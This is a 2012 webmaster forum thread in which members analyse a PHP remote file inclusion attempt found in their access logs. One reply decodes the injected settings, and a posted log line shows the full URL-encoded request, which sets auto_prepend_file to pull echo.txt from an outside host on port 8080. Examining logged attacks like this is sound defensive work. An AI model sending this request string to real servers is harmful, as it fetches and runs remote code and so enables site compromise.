keyplyr
msg:4519870 | 9:22 am on Nov 17, 2012 (gmt 0) |
This is obviously a hack attempt, trying to inject a script. I wonder if you sent a complaint to SPRINT w/ log snippet whether they'd take any action?
|
iamzippy
msg:4519871 | 9:40 am on Nov 17, 2012 (gmt 0) |
It's a variant of the Remote File Inclusion exploit, attempting to pull in a bad file named 'echo.txt' from port 8080 on a server in Seoul, Korea (211.172.112.n:8080).
The Korean organization is 'Iosystem' (211.172.112.0/23), who live at the unfortunately-named 'Sukchon-Dong, Songpa-gu'. Go figure.
|
lucy24
msg:4519875 | 10:17 am on Nov 17, 2012 (gmt 0) |
It's a little more intelligible if you decode:
-dsafe_mode=Off
+-ddisable_functions=NULL
+-dallow_url_fopen=On
+-dallow_url_include=On
+-dauto_prepend_file=http://{filename as identified by iamzippy, above}
I suppose Dong in Korean means something utterly boring like Smith or Street. (I asked g###, but the translator played dumb because it wasn't in Korean script.)
:: off to see if URL is duly mentioned in htaccess ::
|
Ken_S
msg:4520067 | 12:03 pm on Nov 18, 2012 (gmt 0) |
Thanks everyone, I've lurking around for about 3 years now and I have learned a lot from you folks - your expertise has been a great help.
Ken
|
Ken_S
msg:4522429 | 10:03 pm on Nov 25, 2012 (gmt 0) |
Different IP - almost same Request & UA
67.181.147.xxx - - [25/Nov/2012:06:48:27 -0800] "GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+
-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F50.22.136.150%3A8080%2Fecho.txt HTTP/1.1" 403 3195 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)"
|
|
